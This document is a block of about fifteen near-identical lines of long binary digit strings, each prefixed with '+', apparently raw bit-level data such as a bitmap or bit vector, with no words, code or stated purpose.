+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000101011101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100011000011001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111100011011111111111111111111111111111111111111111111111111 